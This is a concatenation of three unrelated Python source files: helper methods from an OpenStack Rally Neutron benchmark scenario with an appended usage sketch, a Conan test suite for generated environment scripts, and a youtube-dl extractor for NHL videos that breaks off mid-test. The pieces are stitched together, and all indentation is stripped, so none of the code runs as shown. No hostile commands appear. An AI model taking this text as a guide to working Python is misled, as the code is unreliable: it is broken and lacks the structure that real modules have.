return self.clients("neutron").list_pools(**kwargs)
@atomic.action_timer("neutron.delete_pool")
def _delete_v1_pool(self, pool):
"""Delete neutron pool.
:param pool: Pool object
"""
self.clients("neutron").delete_pool(pool["id"])
@atomic.action_timer("neutron.update_pool")
def _update_v1_pool(self, pool, **pool_update_args):
"""Update pool.
This atomic function updates the pool with pool_update_args.
:param pool: Pool object
:param pool_update_args: dict, POST /lb/pools update options
:returns: updated neutron pool dict
"""
pool_update_args["name"] = self.generate_random_name()
body = {"pool": pool_update_args}
return self.clients("neutron").update_pool(pool["pool"]["id"], body)
def _create_v1_vip(self, pool, **vip_create_args):
"""Create VIP(v1)
:param pool: dict, neutron lb-pool
:param vip_create_args: dict, POST /lb/vips request options
:returns: dict, neutron lb vip
"""
args = {"protocol": self.LB_PROTOCOL,
"protocol_port": self.LB_PROTOCOL_PORT,
"name": self.generate_random_name(),
"pool_id": pool["pool"]["id"],
"subnet_id": pool["pool"]["subnet_id"]}
args.update(vip_create_args)
return self.clients("neutron").create_vip({"vip": args})
@atomic.action_timer("neutron.list_vips")
def _list_v1_vips(self, **kwargs):
"""Return user lb vip list(v1)."""
return self.clients("neutron").list_vips(**kwargs)
@atomic.action_timer("neutron.delete_vip")
def _delete_v1_vip(self, vip):
"""Delete neutron vip.
:param vip: neutron Virtual IP object
"""
self.clients("neutron").delete_vip(vip["id"])
@atomic.action_timer("neutron.update_vip")
def _update_v1_vip(self, vip, **vip_update_args):
"""Updates vip.
This atomic function updates vip name and admin state
:param vip: Vip object
:param vip_update_args: dict, POST /lb/vips update options
:returns: updated neutron vip dict
"""
vip_update_args["name"] = self.generate_random_name()
body = {"vip": vip_update_args}
return self.clients("neutron").update_vip(vip["vip"]["id"], body)
@atomic.action_timer("neutron.create_floating_ip")
def _create_floatingip(self, floating_network, **floating_ip_args):
"""Create floating IP with floating_network.
:param floating_network: str, external network to create the floating IP in
:param floating_ip_args: dict, POST /floatingips create options
:returns: dict, neutron floating IP
"""
floating_network_id = self._get_network_id(
floating_network)
args = {"floating_network_id": floating_network_id}
args.update(floating_ip_args)
return self.clients("neutron").create_floatingip({"floatingip": args})
@atomic.action_timer("neutron.list_floating_ips")
def _list_floating_ips(self, **kwargs):
"""Return floating IPs list."""
return self.clients("neutron").list_floatingips(**kwargs)
@atomic.action_timer("neutron.delete_floating_ip")
def _delete_floating_ip(self, floating_ip):
"""Delete floating IP.
:param floating_ip: dict, floating IP object
"""
return self.clients("neutron").delete_floatingip(floating_ip["id"])
@atomic.optional_action_timer("neutron.create_healthmonitor")
def _create_v1_healthmonitor(self, **healthmonitor_create_args):
"""Create LB healthmonitor.
This atomic function creates healthmonitor with the provided
healthmonitor_create_args.
:param atomic_action: True if this is an atomic action. added
and handled by the
optional_action_timer() decorator
:param healthmonitor_create_args: dict, POST /lb/healthmonitors
:returns: neutron healthmonitor dict
"""
args = {"type": self.HM_TYPE,
"delay": self.HM_DELAY,
"max_retries": self.HM_MAX_RETRIES,
"timeout": self.HM_TIMEOUT}
args.update(healthmonitor_create_args)
return self.clients("neutron").create_health_monitor(
{"health_monitor": args})
@atomic.action_timer("neutron.list_healthmonitors")
def _list_v1_healthmonitors(self, **kwargs):
"""List LB healthmonitors.
This atomic function lists all healthmonitors.
:param kwargs: optional parameters
:returns: neutron lb healthmonitor list
"""
return self.clients("neutron").list_health_monitors(**kwargs)
@atomic.action_timer("neutron.delete_healthmonitor")
def _delete_v1_healthmonitor(self, healthmonitor):
"""Delete neutron healthmonitor.
:param healthmonitor: neutron healthmonitor dict
"""
self.clients("neutron").delete_health_monitor(healthmonitor["id"])
@atomic.action_timer("neutron.update_healthmonitor")
def _update_v1_healthmonitor(self, healthmonitor,
**healthmonitor_update_args):
"""Update neutron healthmonitor.
:param healthmonitor: neutron lb healthmonitor dict
:param healthmonitor_update_args: POST /lb/healthmonitors
update options
:returns: updated neutron lb healthmonitor dict
"""
body = {"health_monitor": healthmonitor_update_args}
return self.clients("neutron").update_health_monitor(
healthmonitor["health_monitor"]["id"], body)
@atomic.action_timer("neutron.create_security_group")
def _create_security_group(self, **security_group_create_args):
"""Create Neutron security-group.
:param security_group_create_args: dict, POST /v2.0/security-groups
request options
:returns: dict, neutron security-group
"""
security_group_create_args["name"] = self.generate_random_name()
return self.clients("neutron").create_security_group(
{"security_group": security_group_create_args})
@atomic.action_timer("neutron.delete_security_group")
def _delete_security_group(self, security_group):
"""Delete Neutron security group.
:param security_group: dict, neutron security_group
"""
return self.clients("neutron").delete_security_group(
security_group["security_group"]["id"])
@atomic.action_timer("neutron.list_security_groups")
def _list_security_groups(self, **kwargs):
"""Return list of Neutron security groups."""
return self.clients("neutron").list_security_groups(**kwargs)
@atomic.action_timer("neutron.update_security_group")
def _update_security_group(self, security_group,
**security_group_update_args):
"""Update Neutron security-group.
:param security_group: dict, neutron security_group
:param security_group_update_args: dict, POST /v2.0/security-groups
update options
:returns: dict, updated neutron security-group
"""
security_group_update_args["name"] = self.generate_random_name()
body = {"security_group": security_group_update_args}
return self.clients("neutron").update_security_group(
security_group["security_group"]["id"], body)
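# A hypothetical usage sketch (an assumption, not part of the original module) of how
# a concrete benchmark scenario might compose the atomic actions defined above. The
# class name is illustrative and no scenario registration/configuration is shown.
class _ExampleCreateAndDeleteNetworks(NeutronScenario):
    """Illustrative only: create a network, then delete it."""
    def run(self, network_create_args=None):
        # each helper is wrapped by an atomic action timer defined on NeutronScenario
        network = self._create_network(network_create_args or {})
        self._delete_network(network["network"])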
|
|
import os
import platform
import subprocess
import textwrap
import pytest
from conan.tools.env.environment import environment_wrap_command
from conans.test.utils.tools import TestClient, GenConanfile
from conans.util.files import save
@pytest.fixture()
def client():
openssl = textwrap.dedent(r"""
import os
from conans import ConanFile
from conans.tools import save, chdir
class Pkg(ConanFile):
settings = "os"
def package(self):
with chdir(self.package_folder):
echo = "@echo off\necho MYOPENSSL={}!!".format(self.settings.os)
save("bin/myopenssl.bat", echo)
save("bin/myopenssl.sh", echo)
os.chmod("bin/myopenssl.sh", 0o777)
""")
cmake = textwrap.dedent(r"""
import os
from conans import ConanFile
from conans.tools import save, chdir
class Pkg(ConanFile):
settings = "os"
requires = "openssl/1.0"
def package(self):
with chdir(self.package_folder):
echo = "@echo off\necho MYCMAKE={}!!".format(self.settings.os)
save("mycmake.bat", echo + "\ncall myopenssl.bat")
save("mycmake.sh", echo + "\n myopenssl.sh")
os.chmod("mycmake.sh", 0o777)
def package_info(self):
# Custom buildenv not defined by cpp_info
self.buildenv_info.prepend_path("PATH", self.package_folder)
self.buildenv_info.define("MYCMAKEVAR", "MYCMAKEVALUE!!")
""")
gtest = textwrap.dedent(r"""
import os
from conans import ConanFile
from conans.tools import save, chdir
class Pkg(ConanFile):
settings = "os"
def package(self):
with chdir(self.package_folder):
prefix = "@echo off\n" if self.settings.os == "Windows" else ""
echo = "{}echo MYGTEST={}!!".format(prefix, self.settings.os)
save("bin/mygtest.bat", echo)
save("bin/mygtest.sh", echo)
os.chmod("bin/mygtest.sh", 0o777)
def package_info(self):
self.runenv_info.define("MYGTESTVAR", "MyGTestValue{}".format(self.settings.os))
""")
client = TestClient()
save(client.cache.new_config_path, "tools.env.virtualenv:auto_use=True")
client.save({"cmake/conanfile.py": cmake,
"gtest/conanfile.py": gtest,
"openssl/conanfile.py": openssl})
client.run("export openssl openssl/1.0@")
client.run("export cmake mycmake/1.0@")
client.run("export gtest mygtest/1.0@")
myrunner_bat = "@echo off\necho MYGTESTVAR=%MYGTESTVAR%!!\n"
myrunner_sh = "echo MYGTESTVAR=$MYGTESTVAR!!\n"
client.save({"myrunner.bat": myrunner_bat,
"myrunner.sh": myrunner_sh}, clean_first=True)
os.chmod(os.path.join(client.current_folder, "myrunner.sh"), 0o777)
return client
def test_complete(client):
conanfile = textwrap.dedent("""
import os
from conans import ConanFile
class Pkg(ConanFile):
requires = "openssl/1.0"
build_requires = "mycmake/1.0"
apply_env = False
def build_requirements(self):
self.build_requires("mygtest/1.0", force_host_context=True)
def build(self):
self.run("mycmake.bat", env="conanbuildenv")
assert os.path.exists(os.path.join(self.generators_folder, "conanrunenv.sh"))
""")
client.save({"conanfile.py": conanfile})
client.run("install . -s:b os=Windows -s:h os=Linux --build=missing")
# Run the BUILD environment
if platform.system() == "Windows":
cmd = environment_wrap_command("conanbuildenv", "mycmake.bat",
cwd=client.current_folder)
client.run_command(cmd)
assert "MYCMAKE=Windows!!" in client.out
assert "MYOPENSSL=Windows!!" in client.out
# Run the RUN environment
if platform.system() != "Windows":
cmd = environment_wrap_command("conanrunenv", "mygtest.sh && .{}myrunner.sh".format(os.sep),
cwd=client.current_folder)
client.run_command(cmd)
assert "MYGTEST=Linux!!" in client.out
assert "MYGTESTVAR=MyGTestValueLinux!!" in client.out
if platform.system() == "Windows":
client.run("build .")
assert "MYCMAKE=Windows!!" in client.out
assert "MYOPENSSL=Windows!!" in client.out
def test_profile_included_multiple():
client = TestClient()
conanfile = textwrap.dedent("""\
import os, platform
from conans import ConanFile
class Pkg(ConanFile):
def generate(self):
buildenv = self.buildenv.vars(self)
self.output.info("MYVAR1: {}!!!".format(buildenv.get("MYVAR1")))
self.output.info("MYVAR2: {}!!!".format(buildenv.get("MYVAR2")))
self.output.info("MYVAR3: {}!!!".format(buildenv.get("MYVAR3")))
""")
myprofile = textwrap.dedent("""
[buildenv]
MYVAR1=MyVal1
MYVAR3+=MyVal3
""")
other_profile = textwrap.dedent("""
[buildenv]
MYVAR1=MyValOther1
MYVAR2=MyValOther2
MYVAR3=MyValOther3
""")
client.save({"conanfile.py": conanfile,
"myprofile": myprofile,
"myprofile_include": "include(other_profile)\n" + myprofile,
"other_profile": other_profile})
# The reference profile has priority
client.run("install . -pr=myprofile_include")
assert "MYVAR1: MyVal1!!!" in client.out
assert "MYVAR2: MyValOther2!!!" in client.out
assert "MYVAR3: MyValOther3 MyVal3!!!" in client.out
# Including a profile is equivalent to passing it first; the last profile passed has priority
client.run("install . -pr=other_profile -pr=myprofile")
assert "MYVAR1: MyVal1!!!" in client.out
assert "MYVAR2: MyValOther2!!!" in client.out
assert "MYVAR3: MyValOther3 MyVal3!!!" in client.out
def test_profile_buildenv():
client = TestClient()
save(client.cache.new_config_path, "tools.env.virtualenv:auto_use=True")
conanfile = textwrap.dedent("""\
import os, platform
from conans import ConanFile
class Pkg(ConanFile):
def generate(self):
self.buildenv.vars(self).save_script("pkgenv")
if platform.system() != "Windows":
os.chmod("pkgenv.sh", 0o777)
""")
# Some scripts in random system folders; their paths are added to the profile [buildenv]
compiler_bat = "@echo off\necho MYCOMPILER!!\necho MYPATH=%PATH%"
compiler_sh = "echo MYCOMPILER!!\necho MYPATH=$PATH"
compiler2_bat = "@echo off\necho MYCOMPILER2!!\necho MYPATH2=%PATH%"
compiler2_sh = "echo MYCOMPILER2!!\necho MYPATH2=$PATH"
myprofile = textwrap.dedent("""
[buildenv]
PATH+=(path){}
mypkg*:PATH=!
mypkg*:PATH+=(path){}
""".format(os.path.join(client.current_folder, "compiler"),
os.path.join(client.current_folder, "compiler2")))
client.save({"conanfile.py": conanfile,
"myprofile": myprofile,
"compiler/mycompiler.bat": compiler_bat,
"compiler/mycompiler.sh": compiler_sh,
"compiler2/mycompiler.bat": compiler2_bat,
"compiler2/mycompiler.sh": compiler2_sh})
os.chmod(os.path.join(client.current_folder, "compiler", "mycompiler.sh"), 0o777)
os.chmod(os.path.join(client.current_folder, "compiler2", "mycompiler.sh"), 0o777)
client.run("install . -pr=myprofile")
# Run the BUILD environment
ext = "bat" if platform.system() == "Windows" else "sh" # TODO: Decide on logic .bat vs .sh
cmd = environment_wrap_command("conanbuildenv", "mycompiler.{}".format(ext),
cwd=client.current_folder)
client.run_command(cmd)
assert "MYCOMPILER!!" in client.out
assert "MYPATH=" in client.out
# Now with pkg-specific env-var
client.run("install . mypkg/1.0@ -pr=myprofile")
client.run_command(cmd)
assert "MYCOMPILER2!!" in client.out
assert "MYPATH2=" in client.out
def test_transitive_order():
gcc = textwrap.dedent(r"""
from conans import ConanFile
class Pkg(ConanFile):
def package_info(self):
self.runenv_info.append("MYVAR", "MyGCCValue")
""")
openssl = textwrap.dedent(r"""
from conans import ConanFile
class Pkg(ConanFile):
settings = "os"
build_requires = "gcc/1.0"
def package_info(self):
self.runenv_info.append("MYVAR", "MyOpenSSL{}Value".format(self.settings.os))
""")
cmake = textwrap.dedent(r"""
from conans import ConanFile
class Pkg(ConanFile):
requires = "openssl/1.0"
build_requires = "gcc/1.0"
def package_info(self):
self.runenv_info.append("MYVAR", "MyCMakeRunValue")
self.buildenv_info.append("MYVAR", "MyCMakeBuildValue")
""")
client = TestClient()
client.save({"gcc/conanfile.py": gcc,
"cmake/conanfile.py": cmake,
"openssl/conanfile.py": openssl})
client.run("export gcc gcc/1.0@")
client.run("export openssl openssl/1.0@")
client.run("export cmake cmake/1.0@")
consumer = textwrap.dedent(r"""
from conans import ConanFile
from conan.tools.env import VirtualBuildEnv, VirtualRunEnv
class Pkg(ConanFile):
requires = "openssl/1.0"
build_requires = "cmake/1.0", "gcc/1.0"
def generate(self):
buildenv = VirtualBuildEnv(self).vars()
self.output.info("BUILDENV: {}!!!".format(buildenv.get("MYVAR")))
runenv = VirtualRunEnv(self).vars()
self.output.info("RUNENV: {}!!!".format(runenv.get("MYVAR")))
""")
client.save({"conanfile.py": consumer}, clean_first=True)
client.run("install . -s:b os=Windows -s:h os=Linux --build")
assert "BUILDENV: MyGCCValue MyOpenSSLWindowsValue "\
"MyCMakeRunValue MyCMakeBuildValue!!!" in client.out
assert "RUNENV: MyOpenSSLLinuxValue!!!" in client.out
# Even if the generators are duplicated on the command line (this used to fail due to bugs)
client.run("install . -s:b os=Windows -s:h os=Linux --build -g VirtualRunEnv -g VirtualBuildEnv")
assert "BUILDENV: MyGCCValue MyOpenSSLWindowsValue "\
"MyCMakeRunValue MyCMakeBuildValue!!!" in client.out
assert "RUNENV: MyOpenSSLLinuxValue!!!" in client.out
def test_buildenv_from_requires():
openssl = textwrap.dedent(r"""
from conans import ConanFile
class Pkg(ConanFile):
settings = "os"
def package_info(self):
self.buildenv_info.append("OpenSSL_ROOT",
"MyOpenSSL{}Value".format(self.settings.os))
""")
poco = textwrap.dedent(r"""
from conans import ConanFile
class Pkg(ConanFile):
requires = "openssl/1.0"
settings = "os"
def package_info(self):
self.buildenv_info.append("Poco_ROOT", "MyPoco{}Value".format(self.settings.os))
""")
client = TestClient()
client.save({"poco/conanfile.py": poco,
"openssl/conanfile.py": openssl})
client.run("export openssl openssl/1.0@")
client.run("export poco poco/1.0@")
consumer = textwrap.dedent(r"""
from conans import ConanFile
from conan.tools.env import VirtualBuildEnv
class Pkg(ConanFile):
requires = "poco/1.0"
def generate(self):
buildenv = VirtualBuildEnv(self).vars()
self.output.info("BUILDENV POCO: {}!!!".format(buildenv.get("Poco_ROOT")))
self.output.info("BUILDENV OpenSSL: {}!!!".format(buildenv.get("OpenSSL_ROOT")))
""")
client.save({"conanfile.py": consumer}, clean_first=True)
client.run("install . -s:b os=Windows -s:h os=Linux --build -g VirtualBuildEnv")
assert "BUILDENV POCO: MyPocoLinuxValue!!!" in client.out
assert "BUILDENV OpenSSL: MyOpenSSLLinuxValue!!!" in client.out
def test_diamond_repeated():
pkga = textwrap.dedent(r"""
from conans import ConanFile
class Pkg(ConanFile):
def package_info(self):
self.runenv_info.define("MYVAR1", "PkgAValue1")
self.runenv_info.append("MYVAR2", "PkgAValue2")
self.runenv_info.prepend("MYVAR3", "PkgAValue3")
self.runenv_info.prepend("MYVAR4", "PkgAValue4")
""")
pkgb = textwrap.dedent(r"""
from conans import ConanFile
class Pkg(ConanFile):
requires = "pkga/1.0"
def package_info(self):
self.runenv_info.append("MYVAR1", "PkgBValue1")
self.runenv_info.append("MYVAR2", "PkgBValue2")
self.runenv_info.prepend("MYVAR3", "PkgBValue3")
self.runenv_info.prepend("MYVAR4", "PkgBValue4")
""")
pkgc = textwrap.dedent(r"""
from conans import ConanFile
class Pkg(ConanFile):
requires = "pkga/1.0"
def package_info(self):
self.runenv_info.append("MYVAR1", "PkgCValue1")
self.runenv_info.append("MYVAR2", "PkgCValue2")
self.runenv_info.prepend("MYVAR3", "PkgCValue3")
self.runenv_info.prepend("MYVAR4", "PkgCValue4")
""")
pkgd = textwrap.dedent(r"""
from conans import ConanFile
class Pkg(ConanFile):
requires = "pkgb/1.0", "pkgc/1.0"
def package_info(self):
self.runenv_info.append("MYVAR1", "PkgDValue1")
self.runenv_info.append("MYVAR2", "PkgDValue2")
self.runenv_info.prepend("MYVAR3", "PkgDValue3")
self.runenv_info.define("MYVAR4", "PkgDValue4")
""")
pkge = textwrap.dedent(r"""
from conans import ConanFile
from conan.tools.env import VirtualRunEnv
class Pkg(ConanFile):
requires = "pkgd/1.0"
def generate(self):
env = VirtualRunEnv(self)
runenv = env.vars(scope="run")
self.output.info("MYVAR1: {}!!!".format(runenv.get("MYVAR1")))
self.output.info("MYVAR2: {}!!!".format(runenv.get("MYVAR2")))
self.output.info("MYVAR3: {}!!!".format(runenv.get("MYVAR3")))
self.output.info("MYVAR4: {}!!!".format(runenv.get("MYVAR4")))
""")
client = TestClient()
client.save({"pkga/conanfile.py": pkga,
"pkgb/conanfile.py": pkgb,
"pkgc/conanfile.py": pkgc,
"pkgd/conanfile.py": pkgd,
"pkge/conanfile.py": pkge})
client.run("export pkga pkga/1.0@")
client.run("export pkgb pkgb/1.0@")
client.run("export pkgc pkgc/1.0@")
client.run("export pkgd pkgd/1.0@")
client.run("install pkge --build")
assert "MYVAR1: PkgAValue1 PkgCValue1 PkgBValue1 PkgDValue1!!!" in client.out
assert "MYVAR2: PkgAValue2 PkgCValue2 PkgBValue2 PkgDValue2!!!" in client.out
assert "MYVAR3: PkgDValue3 PkgBValue3 PkgCValue3 PkgAValue3!!!" in client.out
assert "MYVAR4: PkgDValue4!!!" in client.out
def test_environment_scripts_generated_envvars():
consumer_pkg = textwrap.dedent(r"""
from conans import ConanFile
from conan.tools.env import VirtualBuildEnv, VirtualRunEnv
class Pkg(ConanFile):
settings = "os"
requires = "require_pkg/1.0"
build_requires = "build_require_pkg/1.0"
generators = "VirtualRunEnv", "VirtualBuildEnv"
""")
client = TestClient()
conanfile = (GenConanfile().with_package_file("bin/myapp", "myexe")
.with_package_file("lib/mylib", "mylibcontent")
.with_settings("os"))
client.save({"build_require_pkg/conanfile.py": conanfile,
"require_pkg/conanfile.py": conanfile,
"consumer_pkg/conanfile.py": consumer_pkg})
client.run("export build_require_pkg build_require_pkg/1.0@")
client.run("export require_pkg require_pkg/1.0@")
client.run("install consumer_pkg --build")
if platform.system() == "Windows":
conanbuildenv = client.load("conanbuildenv.bat")
conanrunenv = client.load("conanrunenv.bat")
assert "LD_LIBRARY_PATH" not in conanbuildenv
assert "LD_LIBRARY_PATH" not in conanrunenv
else:
conanbuildenv = client.load("conanbuildenv.sh")
conanrunenv = client.load("conanrunenv.sh")
assert "LD_LIBRARY_PATH" in conanbuildenv
assert "LD_LIBRARY_PATH" in conanrunenv
# Build context LINUX - Host context LINUX
client.run("install consumer_pkg -s:b os=Linux -s:h os=Linux --build")
conanbuildenv = client.load("conanbuildenv.sh")
conanrunenv = client.load("conanrunenv.sh")
assert "LD_LIBRARY_PATH" in conanbuildenv
assert "LD_LIBRARY_PATH" in conanrunenv
# Build context WINDOWS - Host context WINDOWS
client.run("install consumer_pkg -s:b os=Windows -s:h os=Windows --build")
conanbuildenv = client.load("conanbuildenv.bat")
conanrunenv = client.load("conanrunenv.bat")
assert "LD_LIBRARY_PATH" not in conanbuildenv
assert "LD_LIBRARY_PATH" not in conanrunenv
# Build context LINUX - Host context WINDOWS
client.run("install consumer_pkg -s:b os=Linux -s:h os=Windows --build")
conanbuildenv = client.load("conanbuildenv.sh")
conanrunenv = client.load("conanrunenv.bat")
assert "LD_LIBRARY_PATH" in conanbuildenv
assert "LD_LIBRARY_PATH" not in conanrunenv
# Build context WINDOWS - Host context LINUX
client.run("install consumer_pkg -s:b os=Windows -s:h os=Linux --build")
conanbuildenv = client.load("conanbuildenv.bat")
conanrunenv = client.load("conanrunenv.sh")
assert "LD_LIBRARY_PATH" not in conanbuildenv
assert "LD_LIBRARY_PATH" in conanrunenv
def test_multiple_deactivate():
conanfile = textwrap.dedent(r"""
from conans import ConanFile
from conan.tools.env import Environment
class Pkg(ConanFile):
def generate(self):
e1 = Environment()
e1.define("VAR1", "Value1")
e1.vars(self).save_script("mybuild1")
e2 = Environment()
e2.define("VAR2", "Value2")
e2.vars(self).save_script("mybuild2")
""")
display_bat = textwrap.dedent("""\
@echo off
echo VAR1=%VAR1%!!
echo VAR2=%VAR2%!!
""")
display_sh = textwrap.dedent("""\
echo VAR1=$VAR1!!
echo VAR2=$VAR2!!
""")
client = TestClient()
client.save({"conanfile.py": conanfile,
"display.bat": display_bat,
"display.sh": display_sh})
os.chmod(os.path.join(client.current_folder, "display.sh"), 0o777)
client.run("install .")
if platform.system() == "Windows":
cmd = "conanbuild.bat && display.bat && deactivate_conanbuild.bat && display.bat"
else:
cmd = '. ./conanbuild.sh && ./display.sh && . ./deactivate_conanbuild.sh && ./display.sh'
out, _ = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT,
shell=True, cwd=client.current_folder).communicate()
out = out.decode()
assert "VAR1=Value1!!" in out
assert "VAR2=Value2!!" in out
assert 2 == out.count("Restoring environment")
assert "VAR1=!!" in out
assert "VAR2=!!" in out
def test_profile_build_env_spaces():
display_bat = textwrap.dedent("""\
@echo off
echo VAR1=%VAR1%!!
""")
display_sh = textwrap.dedent("""\
echo VAR1=$VAR1!!
""")
client = TestClient()
client.save({"conanfile.txt": "",
"profile": "[buildenv]\nVAR1 = VALUE1",
"display.bat": display_bat,
"display.sh": display_sh})
os.chmod(os.path.join(client.current_folder, "display.sh"), 0o777)
client.run("install . -g VirtualBuildEnv -pr=profile")
if platform.system() == "Windows":
cmd = "conanbuild.bat && display.bat && deactivate_conanbuild.bat && display.bat"
else:
cmd = '. ./conanbuild.sh && ./display.sh && . ./deactivate_conanbuild.sh && ./display.sh'
out, _ = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT,
shell=True, cwd=client.current_folder).communicate()
out = out.decode()
assert "VAR1= VALUE1!!" in out
assert "Restoring environment" in out
assert "VAR1=!!" in out
def test_deactivate_location():
conanfile = textwrap.dedent(r"""
from conans import ConanFile
from conan.tools.env import Environment
class Pkg(ConanFile):
def package_info(self):
self.buildenv_info.define("FOO", "BAR")
""")
client = TestClient()
client.save({"pkg.py": conanfile})
client.run("create pkg.py pkg/1.0@")
client.run("install pkg/1.0@ -g VirtualBuildEnv --install-folder=myfolder -s build_type=Release -s arch=x86_64")
source_cmd, script_ext = ("myfolder\\", ".bat") if platform.system() == "Windows" else (". ./myfolder/", ".sh")
cmd = "{}conanbuild{}".format(source_cmd, script_ext)
subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, shell=True,
cwd=client.current_folder).communicate()
assert not os.path.exists(os.path.join(client.current_folder,
"deactivate_conanbuildenv-release-x86_64{}".format(script_ext)))
assert os.path.exists(os.path.join(client.current_folder, "myfolder",
"deactivate_conanbuildenv-release-x86_64{}".format(script_ext)))
|
|
from __future__ import unicode_literals
import re
import json
import os
from .common import InfoExtractor
from ..compat import (
compat_urlparse,
compat_urllib_parse_urlencode,
compat_urllib_parse_urlparse,
compat_str,
)
from ..utils import (
unified_strdate,
determine_ext,
int_or_none,
parse_iso8601,
parse_duration,
)
class NHLBaseInfoExtractor(InfoExtractor):
@staticmethod
def _fix_json(json_string):
return json_string.replace('\\\'', '\'')
def _real_extract_video(self, video_id):
vid_parts = video_id.split(',')
if len(vid_parts) == 3:
video_id = '%s0%s%s-X-h' % (vid_parts[0][:4], vid_parts[1], vid_parts[2].rjust(4, '0'))
json_url = 'http://video.nhl.com/videocenter/servlets/playlist?ids=%s&format=json' % video_id
data = self._download_json(
json_url, video_id, transform_source=self._fix_json)
return self._extract_video(data[0])
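# The id rewrite above turns a comma-separated "season,type,game" triple into
# the canonical highlight id, e.g. '20142015,2,299' -> '2014020299-X-h'
# (first four digits of the season, a literal '0', the type, and the game
# number zero-padded to four digits), matching the hlg test case further down.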
def _extract_video(self, info):
video_id = info['id']
self.report_extraction(video_id)
initial_video_url = info['publishPoint']
if info['formats'] == '1':
parsed_url = compat_urllib_parse_urlparse(initial_video_url)
filename, ext = os.path.splitext(parsed_url.path)
path = '%s_sd%s' % (filename, ext)
data = compat_urllib_parse_urlencode({
'type': 'fvod',
'path': compat_urlparse.urlunparse(parsed_url[:2] + (path,) + parsed_url[3:])
})
path_url = 'http://video.nhl.com/videocenter/servlets/encryptvideopath?' + data
path_doc = self._download_xml(
path_url, video_id, 'Downloading final video url')
video_url = path_doc.find('path').text
else:
video_url = initial_video_url
join = compat_urlparse.urljoin
ret = {
'id': video_id,
'title': info['name'],
'url': video_url,
'description': info['description'],
'duration': int(info['duration']),
'thumbnail': join(join(video_url, '/u/'), info['bigImage']),
'upload_date': unified_strdate(info['releaseDate'].split('.')[0]),
}
if video_url.startswith('rtmp:'):
mobj = re.match(r'(?P<tc_url>rtmp://[^/]+/(?P<app>[a-z0-9/]+))/(?P<play_path>mp4:.*)', video_url)
ret.update({
'tc_url': mobj.group('tc_url'),
'play_path': mobj.group('play_path'),
'app': mobj.group('app'),
'no_resume': True,
})
return ret
class NHLVideocenterIE(NHLBaseInfoExtractor):
IE_NAME = 'nhl.com:videocenter'
_VALID_URL = r'https?://video(?P<team>\.[^.]*)?\.nhl\.com/videocenter/(?:console|embed)?(?:\?(?:.*?[?&])?)(?:id|hlg|playlist)=(?P<id>[-0-9a-zA-Z,]+)'
_TESTS = [{
'url': 'http://video.canucks.nhl.com/videocenter/console?catid=6?id=453614',
'md5': 'db704a4ea09e8d3988c85e36cc892d09',
'info_dict': {
'id': '453614',
'ext': 'mp4',
'title': 'Quick clip: Weise 4-3 goal vs Flames',
'description': 'Dale Weise scores his first of the season to put the Canucks up 4-3.',
'duration': 18,
'upload_date': '20131006',
},
}, {
'url': 'http://video.nhl.com/videocenter/console?id=2014020024-628-h',
'md5': 'd22e82bc592f52d37d24b03531ee9696',
'info_dict': {
'id': '2014020024-628-h',
'ext': 'mp4',
'title': 'Alex Galchenyuk Goal on Ray Emery (14:40/3rd)',
'description': 'Home broadcast - Montreal Canadiens at Philadelphia Flyers - October 11, 2014',
'duration': 0,
'upload_date': '20141011',
},
}, {
'url': 'http://video.mapleleafs.nhl.com/videocenter/console?id=58665&catid=802',
'md5': 'c78fc64ea01777e426cfc202b746c825',
'info_dict': {
'id': '58665',
'ext': 'flv',
'title': 'Classic Game In Six - April 22, 1979',
'description': 'It was the last playoff game for the Leafs in the decade, and the last time the Leafs and Habs played in the playoffs. Great game, not a great ending.',
'duration': 400,
'upload_date': '20100129'
},
}, {
'url': 'http://video.flames.nhl.com/videocenter/console?id=630616',
'only_matching': True,
}, {
'url': 'http://video.nhl.com/videocenter/?id=736722',
'only_matching': True,
}, {
'url': 'http://video.nhl.com/videocenter/console?hlg=20142015,2,299&lang=en',
'md5': '076fcb88c255154aacbf0a7accc3f340',
'info_dict': {
'id': '2014020299-X-h',
'ext': 'mp4',
'title': 'Penguins at Islanders / Game Highlights',
'description': 'Home broadcast - Pittsburgh Penguins at New York Islanders - November 22, 2014',
'duration': 268,
'upload_date': '20141122',
}
}, {
'url': 'http://video.oilers.nhl.com/videocenter/console?id=691469&catid=4',
'info_dict': {
'id': '691469',
'ext': 'mp4',
'title': 'RAW | Craig MacTavish Full Press Conference',
'description': 'Oilers GM Craig MacTavish addresses the media at Rexall Place on Friday.',
'upload_date': '20141205',
},
'params': {
'skip_download': True, # Requires rtmpdump
}
}, {
'url': 'http://video.nhl.com/videocenter/embed?playlist=836127',
'only_matching': True,
}]
def _real_extract(self, url):
video_id = self._match_id(url)
return self._real_extract_video(video_id)
class NHLNewsIE(NHLBaseInfoExtractor):
IE_NAME = 'nhl.com:news'
IE_DESC = 'NHL news'
_VALID_URL = r'https?://(?:.+?\.)?nhl\.com/(?:ice|club)/news\.html?(?:\?(?:.*?[?&])?)id=(?P<id>[-0-9a-zA-Z]+)'
_TESTS = [{
'url': 'http://www.nhl.com/ice/news.htm?id=750727',
'md5': '4b3d1262e177687a3009937bd9ec0be8',
'info_dict': {
'id': '736722',
'ext': 'mp4',
'title': 'Cal Clutterbuck has been fined $2,000',
'description': 'md5:45fe547d30edab88b23e0dd0ab1ed9e6',
'duration': 37,
'upload_date': '20150128',
},
}, {
# iframe embed
'url': 'http://sabres.nhl.com/club/news.htm?id=780189',
'md5': '9f663d1c006c90ac9fb82777d4294e12',
'info_dict': {
'id': '836127',
'ext': 'mp4',
'title': 'Morning Skate: OTT vs. BUF (9/23/15)',
'description': "Brian Duff chats with Tyler Ennis prior to Buffalo's first preseason home game.",
'duration': 93,
'upload_date': '20150923',
},
}]
def _real_extract(self, url):
news_id = self._match_id(url)
webpage = self._download_webpage(url, news_id)
video_id = self._search_regex(
[r'pVid(\d+)', r"nlid\s*:\s*'(\d+)'",
r'<iframe[^>]+src=["\']https?://video.*?\.nhl\.com/videocenter/embed\?.*\bplaylist=(\d+)'],
webpage, 'video id')
return self._real_extract_video(video_id)
class NHLVideocenterCategoryIE(NHLBaseInfoExtractor):
IE_NAME = 'nhl.com:videocenter:category'
IE_DESC = 'NHL videocenter category'
_VALID_URL = r'https?://video\.(?P<team>[^.]*)\.nhl\.com/videocenter/(console\?[^(id=)]*catid=(?P<catid>[0-9]+)(?![&?]id=).*?)?$'
_TEST = {
'url': 'http://video.canucks.nhl.com/videocenter/console?catid=999',
'info_dict': {
